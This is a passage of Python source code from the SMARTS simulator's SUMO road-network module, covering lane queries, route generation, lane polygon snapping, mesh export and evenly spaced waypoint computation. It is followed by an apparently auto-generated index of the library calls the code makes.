) -> List[Tuple[RoadMap.Lane, float]]:
if radius is None:
radius = max(10, 2 * self._default_lane_width)
# XXX: note that this getNeighboringLanes() call is fairly heavy/expensive (as revealed by profiling)
# The includeJunctions parameter is the opposite of include_junctions because
# what it does in the Sumo query is attach the "node" that is the junction (node)
# shape to the shape of the non-special lanes that connect to it. So if
# includeJunctions is True, we are more likely to hit "normal" lanes
# even when in an intersection where we want to hit "special"
# lanes when we specify include_junctions=True. Note that "special"
# lanes are always candidates to be returned, no matter what.
candidate_lanes = self._graph.getNeighboringLanes(
point[0],
point[1],
r=radius,
includeJunctions=not include_junctions,
allowFallback=False,
)
if not include_junctions:
candidate_lanes = [
lane for lane in candidate_lanes if not lane[0].getEdge().isSpecial()
]
candidate_lanes.sort(key=lambda lane_dist_tup: lane_dist_tup[1])
return [(self.lane_by_id(lane.getID()), dist) for lane, dist in candidate_lanes]
@lru_cache(maxsize=16)
def road_with_point(self, point: Point) -> RoadMap.Road:
radius = max(5, 2 * self._default_lane_width)
for nl, dist in self.nearest_lanes(point, radius):
if dist < 0.5 * nl._width + 1e-1:
return nl.road
return None
def generate_routes(
self,
start_road: RoadMap.Road,
end_road: RoadMap.Road,
via: Optional[Sequence[RoadMap.Road]] = None,
max_to_gen: int = 1,
) -> List[RoadMap.Route]:
assert max_to_gen == 1, "multiple route generation not yet supported for Sumo"
newroute = SumoRoadNetwork.Route(self)
result = [newroute]
roads = [start_road]
if via:
roads += via
if end_road != start_road:
roads.append(end_road)
edges = []
for cur_road, next_road in zip(roads, roads[1:] + [None]):
if not next_road:
edges.append(cur_road._sumo_edge)
break
sub_route = (
self._graph.getShortestPath(cur_road._sumo_edge, next_road._sumo_edge)[
0
]
or []
)
if len(sub_route) < 2:
self._log.warning(
f"Unable to find valid path between {(cur_road.road_id, next_road.road_id)}."
)
return result
# The sub route includes the boundary roads (cur_road, next_road).
# We clip the latter to prevent duplicates
edges.extend(sub_route[:-1])
if len(edges) == 1:
# route is within a single road
newroute.add_road(self.road_by_id(edges[0].getID()))
return result
used_edges = []
edge_ids = []
adjacent_edge_pairs = zip(edges, edges[1:])
for cur_edge, next_edge in adjacent_edge_pairs:
internal_routes = self._internal_routes_between(cur_edge, next_edge)
for internal_route in internal_routes:
used_edges.extend(internal_route)
edge_ids.extend([edge.getID() for edge in internal_route])
_, indices = np.unique(edge_ids, return_index=True)
for idx in sorted(indices):
newroute.add_road(self.road_by_id(used_edges[idx].getID()))
return result
def _internal_routes_between(
self, start_edge: Edge, end_edge: Edge
) -> List[List[Edge]]:
routes = []
outgoing = start_edge.getOutgoing()
assert end_edge in outgoing, (
f"{end_edge.getID()} not in {[e.getID() for e in outgoing.keys()]}. "
"Perhaps you're using a LapMission on a route that is not a closed loop?"
)
connections = outgoing[end_edge]
for connection in connections:
conn_route = [start_edge]
# This connection may have some intermediate 'via' lanes.
# we need to follow these to eventually leave the junction.
via_lane_id = connection.getViaLaneID()
while via_lane_id:
via_lane = self.lane_by_id(via_lane_id)
via_road = via_lane.road
via_edge = via_road._sumo_edge
conn_route.append(via_edge)
# Sometimes we get the same via lane id multiple times.
# We convert to a set to remove duplicates.
next_via_lane_ids = set(
conn.getViaLaneID() for conn in via_edge.getOutgoing()[end_edge]
)
assert (
len(next_via_lane_ids) == 1
), f"Expected exactly one next via lane id at {via_lane_id}, got: {next_via_lane_ids}"
via_lane_id = list(next_via_lane_ids)[0]
conn_route.append(end_edge)
routes.append(conn_route)
return routes
def random_route(self, max_route_len: int = 10) -> RoadMap.Route:
route = SumoRoadNetwork.Route(self)
next_edges = self._graph.getEdges(False)
while next_edges and len(route.roads) < max_route_len:
cur_edge = random.choice(next_edges)
route.add_road(self.road_by_id(cur_edge.getID()))
next_edges = list(cur_edge.getOutgoing().keys())
return route
def empty_route(self) -> RoadMap.Route:
return SumoRoadNetwork.Route(self)
def waypoint_paths(
self,
pose: Pose,
lookahead: int,
within_radius: float = 5,
route: RoadMap.Route = None,
) -> List[List[Waypoint]]:
if route:
if route.roads:
road_ids = [road.road_id for road in route.roads]
else:
road_ids = self._resolve_in_junction(pose)
if road_ids:
return self._waypoint_paths_along_route(
pose.position, lookahead, road_ids
)
closest_lps = self._lanepoints.closest_lanepoints(
[pose], within_radius=within_radius
)
closest_lane = closest_lps[0].lane
# TAI: the above lines could be replaced by:
# closest_lane = self.nearest_lane(pose.position, radius=within_radius)
waypoint_paths = []
for lane in closest_lane.road.lanes:
waypoint_paths += lane._waypoint_paths_at(pose.position, lookahead)
return sorted(waypoint_paths, key=lambda p: p[0].lane_index)
def _resolve_in_junction(self, pose: Pose) -> List[str]:
# This is so that the waypoints don't jump between connections
# when we don't know which lane we're on in a junction.
# We take the 10 closest lanepoints then filter down to that which has
# the closest heading. This way we get the lanepoint on our lane instead of
# a potentially closer lane that is on a different junction connection.
closest_lps = self._lanepoints.closest_lanepoints([pose], within_radius=None)
closest_lps.sort(key=lambda lp: abs(pose.heading - lp.pose.heading))
lane = closest_lps[0].lane
if not lane.in_junction:
return []
road_ids = [lane.road.road_id]
next_roads = lane.road.outgoing_roads
assert (
len(next_roads) <= 1
), "A junction is expected to have <= 1 outgoing roads"
if next_roads:
road_ids.append(next_roads[0].road_id)
return road_ids
def _waypoint_paths_along_route(
self, point, lookahead: int, route: Sequence[str]
) -> List[List[Waypoint]]:
"""finds the closest lane to vehicle's position that is on its route,
then gets waypoint paths from all lanes in its edge there."""
assert len(route) > 0, f"Expected at least 1 road in the route, got: {route}"
closest_llp_on_each_route_road = [
self._lanepoints.closest_linked_lanepoint_on_road(point, road)
for road in route
]
closest_linked_lp = min(
closest_llp_on_each_route_road,
key=lambda l_lp: np.linalg.norm(
vec_2d(l_lp.lp.pose.position) - vec_2d(point)
),
)
closest_lane = closest_linked_lp.lp.lane
waypoint_paths = []
for lane in closest_lane.road.lanes:
waypoint_paths += lane._waypoint_paths_at(point, lookahead, route)
return sorted(waypoint_paths, key=lambda p: p[0].lane_index)
class Route(RoadMap.Route):
"""Describes a route between two roads."""
def __init__(self, road_map):
self._roads = []
self._length = 0
self._map = road_map
@property
def roads(self) -> List[RoadMap.Road]:
return self._roads
@property
def road_length(self) -> float:
return self._length
def add_road(self, road: RoadMap.Road):
"""Add a road to this route."""
self._length += road.length
self._roads.append(road)
@cached_property
def geometry(self) -> Sequence[Sequence[Tuple[float, float]]]:
return [
list(
road.shape(
0.0, sum([lane._width for lane in road.lanes])
).exterior.coords
)
for road in self.roads
]
@lru_cache(maxsize=8)
def distance_between(self, start: Point, end: Point) -> Optional[float]:
for cand_start_lane, _ in self._map.nearest_lanes(start, 30.0, False):
try:
sind = self._roads.index(cand_start_lane.road)
break
except ValueError:
pass
else:
logging.warning("unable to find road on route near start point")
return None
start_road = cand_start_lane.road
for cand_end_lane, _ in self._map.nearest_lanes(end, 30.0, False):
try:
eind = self._roads.index(cand_end_lane.road)
break
except ValueError:
pass
else:
logging.warning("unable to find road on route near end point")
return None
end_road = cand_end_lane.road
d = 0
start_offset = cand_start_lane.offset_along_lane(start)
end_offset = cand_end_lane.offset_along_lane(end)
if start_road == end_road:
return end_offset - start_offset
negate = False
if sind > eind:
cand_start_lane = cand_end_lane
start_road, end_road = end_road, start_road
start_offset, end_offset = end_offset, start_offset
negate = True
for road in self._roads:
if d == 0 and road == start_road:
d += cand_start_lane.length - start_offset
elif road == end_road:
d += end_offset
break
elif d > 0:
d += road.length
return -d if negate else d
@lru_cache(maxsize=8)
def project_along(
self, start: Point, distance: float
) -> Optional[Set[Tuple[RoadMap.Lane, float]]]:
route_roads = set(self._roads)
for cand_start_lane, _ in self._map.nearest_lanes(start, 30.0, False):
if cand_start_lane.road in route_roads:
break
else:
logging.warning("unable to find road on route near start point")
return None
started = False
for road in self._roads:
if not started:
if road != cand_start_lane.road:
continue
started = True
lane_pt = cand_start_lane.to_lane_coord(start)
start_offset = lane_pt.s
else:
start_offset = 0
if distance > road.length - start_offset:
distance -= road.length - start_offset
continue
return {(lane, distance) for lane in road.lanes}
return set()
def _compute_road_polygons(self):
lane_to_poly = {}
for edge in self._graph.getEdges():
for lane in edge.getLanes():
shape = buffered_shape(lane.getShape(), lane.getWidth())
# Check if "shape" is just a point.
if len(set(shape.exterior.coords)) == 1:
logging.debug(
f"Lane:{lane.getID()} has provided non-shape values {lane.getShape()}"
)
continue
lane_to_poly[lane.getID()] = shape
# Remove holes created at tight junctions due to crude map geometry
self._snap_internal_holes(lane_to_poly)
self._snap_external_holes(lane_to_poly)
# Remove break in visible lane connections created when lane enters an intersection
self._snap_internal_edges(lane_to_poly)
polys = list(lane_to_poly.values())
for node in self._graph.getNodes():
line = node.getShape()
if len(line) <= 2 or len(set(line)) == 1:
self._log.debug(
"Skipping {}-type node with <= 2 vertices".format(node.getType())
)
continue
polys.append(Polygon(line))
return polys
def _snap_internal_edges(self, lane_to_poly, snap_threshold=2):
# HACK: Internal edges that have tight curves, when buffered their ends do not
# create a tight seam with the connected lanes. This procedure attempts
# to remedy that with snapping.
for lane_id in lane_to_poly:
lane = self._graph.getLane(lane_id)
# Only do snapping for internal edge lanes
if not lane.getEdge().isSpecial():
continue
lane_shape = lane_to_poly[lane_id]
incoming = self._graph.getLane(lane_id).getIncoming()[0]
incoming_shape = lane_to_poly.get(incoming.getID())
if incoming_shape:
lane_shape = Polygon(snap(lane_shape, incoming_shape, snap_threshold))
lane_to_poly[lane_id] = lane_shape
outgoing = self._graph.getLane(lane_id).getOutgoing()[0].getToLane()
outgoing_shape = lane_to_poly.get(outgoing.getID())
if outgoing_shape:
lane_shape = Polygon(snap(lane_shape, outgoing_shape, snap_threshold))
lane_to_poly[lane_id] = lane_shape
def _snap_internal_holes(self, lane_to_poly, snap_threshold=2):
for lane_id in lane_to_poly:
lane = self._graph.getLane(lane_id)
# Only do snapping for internal edge lane holes
if not lane.getEdge().isSpecial():
continue
lane_shape = lane_to_poly[lane_id]
new_coords = []
last_added = None
for x, y in lane_shape.exterior.coords:
p = shPoint(x, y)
snapped_to = set()
moved = True
thresh = snap_threshold
while moved:
moved = False
for nl, dist in self.nearest_lanes(
Point(p.x, p.y),
include_junctions=False,
):
if not nl or nl.lane_id == lane_id or nl in snapped_to:
continue
nl_shape = lane_to_poly.get(nl.lane_id)
if nl_shape:
_, np = nearest_points(p, nl_shape)
if p.distance(np) < thresh:
p = np # !!!! :)
# allow vertices to snap to more than one thing, but
# try to avoid infinite loops and making things worse instead of better here...
# (so reduce snap dist threshold by an arbitrary amount each pass.)
moved = True
snapped_to.add(nl)
thresh *= 0.75
if p != last_added:
new_coords.append(p)
last_added = p
if new_coords:
lane_to_poly[lane_id] = Polygon(new_coords)
def _snap_external_holes(self, lane_to_poly, snap_threshold=2):
for lane_id in lane_to_poly:
lane = self._graph.getLane(lane_id)
# Only do snapping for external edge lane holes
if lane.getEdge().isSpecial():
continue
incoming = lane.getIncoming()
if incoming and incoming[0].getEdge().isSpecial():
continue
outgoing = lane.getOutgoing()
if outgoing:
outgoing_lane = outgoing[0].getToLane()
if outgoing_lane.getEdge().isSpecial():
continue
lane_shape = lane_to_poly[lane_id]
new_coords = []
last_added = None
for x, y in lane_shape.exterior.coords:
p = shPoint(x, y)
snapped_to = set()
moved = True
thresh = snap_threshold
while moved:
moved = False
for nl, dist in self.nearest_lanes(
Point(p.x, p.y),
include_junctions=False,
):
if (
not nl
or nl.in_junction
or nl.lane_id == lane_id
or nl in snapped_to
):
continue
nl_shape = lane_to_poly.get(nl.lane_id)
if nl_shape:
_, np = nearest_points(p, nl_shape)
if p.distance(np) < thresh:
p = np # !!!! :)
# allow vertices to snap to more than one thing, but
# try to avoid infinite loops and making things worse instead of better here...
# (so reduce snap dist threshold by an arbitrary amount each pass.)
moved = True
snapped_to.add(nl)
thresh *= 0.75
if p != last_added:
new_coords.append(p)
last_added = p
if new_coords:
lane_to_poly[lane_id] = Polygon(new_coords)
def _make_glb_from_polys(self, polygons):
scene = trimesh.Scene()
mesh = generate_mesh_from_polygons(polygons)
# Attach additional information for rendering as metadata in the map glb
metadata = {}
# <2D-BOUNDING_BOX>: four floats separated by ',' (<FLOAT>,<FLOAT>,<FLOAT>,<FLOAT>),
# which describe x-minimum, y-minimum, x-maximum, and y-maximum
metadata["bounding_box"] = self._graph.getBoundary()
# lane markings information
lane_dividers, edge_dividers = self._compute_traffic_dividers()
metadata["lane_dividers"] = lane_dividers
metadata["edge_dividers"] = edge_dividers
mesh.visual = trimesh.visual.TextureVisuals(
material=trimesh.visual.material.PBRMaterial()
)
scene.add_geometry(mesh)
return _GLBData(gltf.export_glb(scene, extras=metadata, include_normals=True))
def _compute_traffic_dividers(self, threshold=1):
lane_dividers = [] # divider between lanes with same traffic direction
edge_dividers = [] # divider between lanes with opposite traffic direction
edge_borders = []
for edge in self._graph.getEdges():
# Omit intersection for now
if edge.getFunction() == "internal":
continue
lanes = edge.getLanes()
for i in range(len(lanes)):
shape = lanes[i].getShape()
left_side = sumolib.geomhelper.move2side(
shape, -lanes[i].getWidth() / 2
)
right_side = sumolib.geomhelper.move2side(
shape, lanes[i].getWidth() / 2
)
if i == 0:
edge_borders.append(right_side)
if i == len(lanes) - 1:
edge_borders.append(left_side)
else:
lane_dividers.append(left_side)
# The edge borders that overlapped in positions form an edge divider
for i in range(len(edge_borders) - 1):
for j in range(i + 1, len(edge_borders)):
edge_border_i = np.array(
[edge_borders[i][0], edge_borders[i][-1]]
) # start and end position
edge_border_j = np.array(
[edge_borders[j][-1], edge_borders[j][0]]
) # start and end position with reverse traffic direction
# The edge borders of two lanes do not always overlap perfectly, thus relax the tolerance threshold to 1
if np.linalg.norm(edge_border_i - edge_border_j) < threshold:
edge_dividers.append(edge_borders[i])
return lane_dividers, edge_dividers
# specific to SUMO road networks
def get_edge_in_junction(
self, start_edge_id, start_lane_index, end_edge_id, end_lane_index
) -> str:
"""Returns the id of the edge between the start and end edge. Can be used for any edge but
is mainly useful for junctions.
"""
start_edge = self._graph.getEdge(start_edge_id)
start_lane = start_edge.getLane(start_lane_index)
end_edge = self._graph.getEdge(end_edge_id)
end_lane = end_edge.getLane(end_lane_index)
connection = start_lane.getConnection(end_lane)
        # If there is no connection between them, fall back to the best available option
if connection is None:
# The first id is good enough since we just need to determine the junction edge id
connection = start_edge.getConnections(end_edge)[0]
connection_lane_id = connection.getViaLaneID()
connection_lane = self._graph.getLane(connection_lane_id)
return connection_lane.getEdge().getID()
class _WaypointsCache:
def __init__(self):
self.lookahead = 0
self.point = (0, 0, 0)
self.filter_road_ids = ()
self._starts = {}
# XXX: all vehicles share this cache now (as opposed to before
# when it was in Plan.py and each vehicle had its own cache).
# TODO: probably need to add vehicle_id to the key somehow (or just make it bigger)
def _match(self, lookahead, point, filter_road_ids) -> bool:
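        # A cached result is reusable only for the exact same query point and
        # road filter, and for a lookahead no longer than the cached one
        # (cached paths are simply sliced down in query()).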
return (
lookahead <= self.lookahead
and point[0] == self.point[0]
and point[1] == self.point[1]
and filter_road_ids == self.filter_road_ids
)
def update(
self,
lookahead: int,
point: Tuple[float, float, float],
filter_road_ids: tuple,
llp,
paths: List[List[Waypoint]],
):
"""Update the current cache if not already cached."""
if not self._match(lookahead, point, filter_road_ids):
self.lookahead = lookahead
self.point = point
self.filter_road_ids = filter_road_ids
self._starts = {}
self._starts[llp.lp.lane.index] = paths
def query(
self,
lookahead: int,
point: Tuple[float, float, float],
filter_road_ids: tuple,
llp,
) -> Optional[List[List[Waypoint]]]:
"""Attempt to find previously cached waypoints"""
if self._match(lookahead, point, filter_road_ids):
hit = self._starts.get(llp.lp.lane.index, None)
if hit:
# consider just returning all of them (not slicing)?
return [path[: (lookahead + 1)] for path in hit]
return None
def _waypoints_starting_at_lanepoint(
self,
lanepoint: LinkedLanePoint,
lookahead: int,
filter_road_ids: tuple,
point: Tuple[float, float, float],
) -> List[List[Waypoint]]:
"""computes equally-spaced Waypoints for all lane paths starting at lanepoint
up to lookahead waypoints ahead, constrained to filter_road_ids if specified."""
# The following acts sort of like lru_cache(1), but it allows
# for lookahead to be <= to the cached value...
cache_paths = self._waypoints_cache.query(
lookahead, point, filter_road_ids, lanepoint
)
if cache_paths:
return cache_paths
lanepoint_paths = self._lanepoints.paths_starting_at_lanepoint(
lanepoint, lookahead, filter_road_ids
)
result = [
SumoRoadNetwork._equally_spaced_path(
path, point, self._map_spec.lanepoint_spacing
)
for path in lanepoint_paths
]
self._waypoints_cache.update(
lookahead, point, filter_road_ids, lanepoint, result
)
return result
@staticmethod
def _equally_spaced_path(
path: Sequence[LinkedLanePoint],
point: Tuple[float, float, float],
lp_spacing: float,
) -> List[Waypoint]:
"""given a list of LanePoints starting near point, that may not be evenly spaced,
returns the same number of Waypoints that are evenly spaced and start at point."""
continuous_variables = [
"positions_x",
"positions_y",
"headings",
"lane_width",
"speed_limit",
]
discrete_variables = ["lane_id", "lane_index"]
ref_lanepoints_coordinates = {
parameter: [] for parameter in (continuous_variables + discrete_variables)
}
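        # Collect the raw (possibly unevenly spaced) attributes of each
        # non-inferred lanepoint along the path; both endpoints are always kept.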
for idx, lanepoint in enumerate(path):
if lanepoint.is_inferred and 0 < idx < len(path) - 1:
continue
ref_lanepoints_coordinates["positions_x"].append(
lanepoint.lp.pose.position[0]
)
ref_lanepoints_coordinates["positions_y"].append(
lanepoint.lp.pose.position[1]
)
ref_lanepoints_coordinates["headings"].append(
lanepoint.lp.pose.heading.as_bullet
)
ref_lanepoints_coordinates["lane_id"].append(lanepoint.lp.lane.lane_id)
ref_lanepoints_coordinates["lane_index"].append(lanepoint.lp.lane.index)
ref_lanepoints_coordinates["lane_width"].append(lanepoint.lp.lane._width)
ref_lanepoints_coordinates["speed_limit"].append(
lanepoint.lp.lane.speed_limit
)
ref_lanepoints_coordinates["headings"] = inplace_unwrap(
ref_lanepoints_coordinates["headings"]
)
first_lp_heading = ref_lanepoints_coordinates["headings"][0]
lp_position = path[0].lp.pose.position[:2]
vehicle_pos = np.array(point[:2])
heading_vec = np.array(radians_to_vec(first_lp_heading))
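        # Project the vehicle's offset from the first lanepoint onto the path
        # heading and shift the first reference position accordingly, so the
        # resampled path starts at (the projection of) the query point.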
projected_distant_lp_vehicle = np.inner(
(vehicle_pos - lp_position), heading_vec
)
ref_lanepoints_coordinates["positions_x"][0] = (
lp_position[0] + projected_distant_lp_vehicle * heading_vec[0]
)
ref_lanepoints_coordinates["positions_y"][0] = (
lp_position[1] + projected_distant_lp_vehicle * heading_vec[1]
)
        # To ensure that the distances between waypoints are equal, we use an
        # interpolation approach inspired by:
        # https://stackoverflow.com/a/51515357
cumulative_path_dist = np.cumsum(
np.sqrt(
np.ediff1d(ref_lanepoints_coordinates["positions_x"], to_begin=0) ** 2
+ np.ediff1d(ref_lanepoints_coordinates["positions_y"], to_begin=0) ** 2
)
)
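        # cumulative_path_dist[i] is the arc length along the reference path
        # from its start to the i-th lanepoint (to_begin=0 keeps the array
        # aligned with the lanepoints); very short paths fall back to a
        # single waypoint below.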
if len(cumulative_path_dist) <= lp_spacing:
lp = path[0].lp
return [
Waypoint(
pos=lp.pose.position,
heading=lp.pose.heading,
lane_width=lp.lane._width,
speed_limit=lp.lane.speed_limit,
lane_id=lp.lane.lane_id,
lane_index=lp.lane.index,
)
]
evenly_spaced_cumulative_path_dist = np.linspace(
0, cumulative_path_dist[-1], len(path)
)
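        # Resample at len(path) stations spaced equally in arc length.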
evenly_spaced_coordinates = {}
for variable in continuous_variables:
evenly_spaced_coordinates[variable] = np.interp(
evenly_spaced_cumulative_path_dist,
cumulative_path_dist,
ref_lanepoints_coordinates[variable],
)
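        # Discrete variables (lane_id, lane_index) cannot be interpolated;
        # each resampled station takes the value of the last reference
        # lanepoint at or before it along the path.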
for variable in discrete_variables:
ref_coordinates = ref_lanepoints_coordinates[variable]
evenly_spaced_coordinates[variable] = []
jdx = 0
for idx in range(len(path)):
while (
jdx + 1 < len(cumulative_path_dist)
and evenly_spaced_cumulative_path_dist[idx]
> cumulative_path_dist[jdx + 1]
):
jdx += 1
evenly_spaced_coordinates[variable].append(ref_coordinates[jdx])
evenly_spaced_coordinates[variable].append(ref_coordinates[-1])
equally_spaced_path = []
for idx in range(len(path)):
equally_spaced_path.append(
Waypoint(
pos=np.array(
[
evenly_spaced_coordinates["positions_x"][idx],
evenly_spaced_coordinates["positions_y"][idx],
]
),
heading=Heading(evenly_spaced_coordinates["headings"][idx]),
lane_width=evenly_spaced_coordinates["lane_width"][idx],
speed_limit=evenly_spaced_coordinates["speed_limit"][idx],
lane_id=evenly_spaced_coordinates["lane_id"][idx],
lane_index=evenly_spaced_coordinates["lane_index"][idx],
)
)
return equally_spaced_path
|
[
"smarts.core.utils.sumo.sumolib.geomhelper.positionAtShapeOffset",
"os.path.isfile",
"numpy.linalg.norm",
"numpy.inner",
"trimesh.exchange.gltf.export_glb",
"numpy.interp",
"os.path.join",
"numpy.unique",
"shapely.geometry.Point",
"trimesh.Scene",
"shapely.geometry.Polygon",
"logging.warning",
"os.path.dirname",
"numpy.radians",
"subprocess.check_output",
"smarts.core.utils.sumo.sumolib.geomhelper.polygonOffsetWithMinimumDistanceToPoint",
"smarts.core.utils.sumo.sumolib.net.readNet",
"smarts.core.utils.sumo.sumolib.geomhelper.distance",
"numpy.dot",
"shapely.ops.nearest_points",
"shapely.ops.snap",
"os.path.isdir",
"random.choice",
"trimesh.visual.material.PBRMaterial",
"numpy.array",
"functools.lru_cache",
"logging.getLogger",
"numpy.ediff1d"
] |
[((4537, 4557), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(1)'}), '(maxsize=1)\n', (4546, 4557), False, 'from functools import lru_cache\n'), ((26149, 26170), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(16)'}), '(maxsize=16)\n', (26158, 26170), False, 'from functools import lru_cache\n'), ((27621, 27642), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(16)'}), '(maxsize=16)\n', (27630, 27642), False, 'from functools import lru_cache\n'), ((3288, 3330), 'logging.getLogger', 'logging.getLogger', (['self.__class__.__name__'], {}), '(self.__class__.__name__)\n', (3305, 3330), False, 'import logging\n'), ((4411, 4441), 'os.path.dirname', 'os.path.dirname', (['net_file_path'], {}), '(net_file_path)\n', (4426, 4441), False, 'import os\n'), ((4457, 4513), 'os.path.join', 'os.path.join', (['net_file_folder', 'cls.shifted_net_file_name'], {}), '(net_file_folder, cls.shifted_net_file_name)\n', (4469, 4513), False, 'import os\n'), ((4682, 4713), 'logging.getLogger', 'logging.getLogger', (['cls.__name__'], {}), '(cls.__name__)\n', (4699, 4713), False, 'import logging\n'), ((5950, 5998), 'smarts.core.utils.sumo.sumolib.net.readNet', 'sumolib.net.readNet', (['net_file'], {'withInternal': '(True)'}), '(net_file, withInternal=True)\n', (5969, 5998), False, 'from smarts.core.utils.sumo import sumolib\n'), ((7458, 7488), 'os.path.isdir', 'os.path.isdir', (['map_spec.source'], {}), '(map_spec.source)\n', (7471, 7488), False, 'import os\n'), ((14204, 14225), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(16)'}), '(maxsize=16)\n', (14213, 14225), False, 'from functools import lru_cache\n'), ((17696, 17716), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(4)'}), '(maxsize=4)\n', (17705, 17716), False, 'from functools import lru_cache\n'), ((18393, 18413), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (18402, 18413), False, 'from functools import lru_cache\n'), ((18819, 18839), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (18828, 18839), False, 'from functools import lru_cache\n'), ((19699, 19719), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (19708, 19719), False, 'from functools import lru_cache\n'), ((19923, 19943), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (19932, 19943), False, 'from functools import lru_cache\n'), ((20192, 20212), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (20201, 20212), False, 'from functools import lru_cache\n'), ((20346, 20366), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (20355, 20366), False, 'from functools import lru_cache\n'), ((20485, 20497), 'functools.lru_cache', 'lru_cache', (['(8)'], {}), '(8)\n', (20494, 20497), False, 'from functools import lru_cache\n'), ((20628, 20640), 'functools.lru_cache', 'lru_cache', (['(8)'], {}), '(8)\n', (20637, 20640), False, 'from functools import lru_cache\n'), ((20780, 20800), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (20789, 20800), False, 'from functools import lru_cache\n'), ((20928, 20948), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (20937, 20948), False, 'from functools import lru_cache\n'), ((23185, 23206), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(16)'}), '(maxsize=16)\n', (23194, 23206), False, 'from functools import lru_cache\n'), ((24412, 24432), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (24421, 24432), False, 'from functools import lru_cache\n'), ((24745, 24765), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (24754, 24765), False, 'from functools import lru_cache\n'), ((25037, 25057), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(4)'}), '(maxsize=4)\n', (25046, 25057), False, 'from functools import lru_cache\n'), ((29803, 29841), 'numpy.unique', 'np.unique', (['edge_ids'], {'return_index': '(True)'}), '(edge_ids, return_index=True)\n', (29812, 29841), True, 'import numpy as np\n'), ((35980, 36000), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (35989, 36000), False, 'from functools import lru_cache\n'), ((37792, 37812), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (37801, 37812), False, 'from functools import lru_cache\n'), ((45593, 45608), 'trimesh.Scene', 'trimesh.Scene', ([], {}), '()\n', (45606, 45608), False, 'import trimesh\n'), ((54227, 54246), 'numpy.array', 'np.array', (['point[:2]'], {}), '(point[:2])\n', (54235, 54246), True, 'import numpy as np\n'), ((54351, 54399), 'numpy.inner', 'np.inner', (['(vehicle_pos - lp_position)', 'heading_vec'], {}), '(vehicle_pos - lp_position, heading_vec)\n', (54359, 54399), True, 'import numpy as np\n'), ((2213, 2238), 'numpy.radians', 'np.radians', (['camera.fov[1]'], {}), '(camera.fov[1])\n', (2223, 2238), True, 'import numpy as np\n'), ((5018, 5131), 'subprocess.check_output', 'check_output', (["['netconvert', '--offset.disable-normalization=FALSE', '-s', net_file_path,\n '-o', shifted_path]"], {}), "(['netconvert', '--offset.disable-normalization=FALSE', '-s',\n net_file_path, '-o', shifted_path])\n", (5030, 5131), False, 'from subprocess import check_output\n'), ((7575, 7619), 'os.path.join', 'os.path.join', (['map_spec.source', '"""map.net.xml"""'], {}), "(map_spec.source, 'map.net.xml')\n", (7587, 7619), False, 'import os\n'), ((14738, 14761), 'numpy.linalg.norm', 'np.linalg.norm', (['my_vect'], {}), '(my_vect)\n', (14752, 14761), True, 'import numpy as np\n'), ((20085, 20146), 'smarts.core.utils.sumo.sumolib.geomhelper.positionAtShapeOffset', 'sumolib.geomhelper.positionAtShapeOffset', (['shape', 'lane_point.s'], {}), '(shape, lane_point.s)\n', (20125, 20146), False, 'from smarts.core.utils.sumo import sumolib\n'), ((31756, 31781), 'random.choice', 'random.choice', (['next_edges'], {}), '(next_edges)\n', (31769, 31781), False, 'import random\n'), ((46382, 46443), 'trimesh.exchange.gltf.export_glb', 'gltf.export_glb', (['scene'], {'extras': 'metadata', 'include_normals': '(True)'}), '(scene, extras=metadata, include_normals=True)\n', (46397, 46443), False, 'from trimesh.exchange import gltf\n'), ((55834, 55943), 'numpy.interp', 'np.interp', (['evenly_spaced_cumulative_path_dist', 'cumulative_path_dist', 'ref_lanepoints_coordinates[variable]'], {}), '(evenly_spaced_cumulative_path_dist, cumulative_path_dist,\n ref_lanepoints_coordinates[variable])\n', (55843, 55943), True, 'import numpy as np\n'), ((6137, 6169), 'os.path.isfile', 'os.path.isfile', (['shifted_net_file'], {}), '(shifted_net_file)\n', (6151, 6169), False, 'import os\n'), ((6322, 6378), 'smarts.core.utils.sumo.sumolib.net.readNet', 'sumolib.net.readNet', (['shifted_net_file'], {'withInternal': '(True)'}), '(shifted_net_file, withInternal=True)\n', (6341, 6378), False, 'from smarts.core.utils.sumo import sumolib\n'), ((15122, 15140), 'numpy.linalg.norm', 'np.linalg.norm', (['lv'], {}), '(lv)\n', (15136, 15140), True, 'import numpy as np\n'), ((19052, 19149), 'smarts.core.utils.sumo.sumolib.geomhelper.polygonOffsetWithMinimumDistanceToPoint', 'sumolib.geomhelper.polygonOffsetWithMinimumDistanceToPoint', (['point', 'shape'], {'perpendicular': '(False)'}), '(point, shape,\n perpendicular=False)\n', (19110, 19149), False, 'from smarts.core.utils.sumo import sumolib\n'), ((19520, 19571), 'smarts.core.utils.sumo.sumolib.geomhelper.distance', 'sumolib.geomhelper.distance', (['shape[i]', 'shape[i + 1]'], {}), '(shape[i], shape[i + 1])\n', (19547, 19571), False, 'from smarts.core.utils.sumo import sumolib\n'), ((36373, 36437), 'logging.warning', 'logging.warning', (['"""unable to find road on route near start point"""'], {}), "('unable to find road on route near start point')\n", (36388, 36437), False, 'import logging\n'), ((36797, 36859), 'logging.warning', 'logging.warning', (['"""unable to find road on route near end point"""'], {}), "('unable to find road on route near end point')\n", (36812, 36859), False, 'import logging\n'), ((38186, 38250), 'logging.warning', 'logging.warning', (['"""unable to find road on route near start point"""'], {}), "('unable to find road on route near start 